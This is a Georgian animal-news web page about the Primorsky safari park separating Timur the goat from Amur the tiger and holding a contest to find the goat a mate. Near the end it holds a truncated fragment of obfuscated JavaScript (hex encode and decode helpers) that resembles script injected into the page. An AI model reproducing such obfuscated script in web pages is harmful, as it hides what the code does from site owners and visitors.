მიიღეს გადაწყვეტილება ამური და თემური ერთმანეთს დააცილონ
მიიღეს გადაწყვეტილება ამური და თემური ერთმანეთს დააცილონ
"თხა თემური, რომელიც ვეფხვ ამურს დაუმეგობრა მეგობარს დააშორეს",- ამის ინფორმაციას ზღვისპირეთის საფარი-პარკის დირექტორი, დიმიტრი მეზენცევი ფეისბუქის გვერდზე აქვეყნებს.

მას შემდეგ, რაც ვეფხვის ბრჭყალებისგან დაზიანებულმა თხამ ვეტკლინიკაში რამოდენიმე დღე გაატარა, თემურისთვის ახალი ტერიტორიის გამოძებნის გადაწყვეტილება მიიღეს. ის ამურის მეზობლად იცხოვრებს.

"თემური თავს კარგად გრძნობს. ვეტკლინიკიდან გამოწერის დროს ვეტერინარმა დაადგინა. ლაზარეთიდან გამოსვლის შემდეგ თემურის ამურის პარკის მეორე მხარეს განთავსებულ დიდ პარკში გაუშვებენ და თემური და ამური ერთმანეთს ღობის იქით შეეხმიანებიან. იცხოვრებენ თუ არა თემური და ამური მომავალშიც ერთ პარკში, დრო გვიჩვენებს. ამის შესახებ
გადაწყვეტილება ბევრ ნიუანსზეა დამოკიდებული, რომელიც ჯერ არ არის ცნობილი", - ჰყვება მეზენცევი.

საფარი-პარკის დირექტორის ცნობით,
თემურს მომავალში საცოლეს ჩამოუყვანენ.

"ამჟამად თემურისთვის საუკეთესო საცოლის შესარჩევი კონკურსი მიმდინარეობს. უკვე არიან პირველი პრეტენდენტებიც. კონკურსში მონაწილეობის მისაღებად გთხოვთ გამოგვიგზავნოთ ღირსეული მონაწილის რეზიუმე", - მოუწოდებს დიმიტრი.

ვეფხვთან ინციდენტის შემდეგ თხის ფსიქოლოგიური რეაბილიტაციისთვის საფარი-პარკის ადმინისტრაციამ გადაწყვიტა თემურის საცოლე მოუძებნოს და 29 იანვარს კონკურსი გამოაცხადა.

თემურისა და ამურის მეგობრობის შესახებ 26 ნოემბერს გახდა ცნობილი, როდესაც ვეფხვთან შესაჭმელად თხა შეუშვეს, მან კი პირი არ დააკარა. ცხოველები დამეგობრდნენ და მას შემდეგ დროს ერთად ატარებდნენ.

იხილეთ ასევე: "ამურის ვეფხვი მასთან შესაჭმელად შეშვებულ თხას დაუმეგობრდა"

"მეცნიერებმა თემურისა და ამურის ერთად ცხოვრების ფენომენი ამოხსნეს"

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o {var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
კომენტარი ჯერ არ გაკეთებულა
დახმარება
  • რა ვაჭამოთ?
  • ჯიშები
  • სად ვიყიდოთ?
გამოკითხვა
რომელი ბრენდის საკვებს აჭმევთ თქვენს ძაღლს?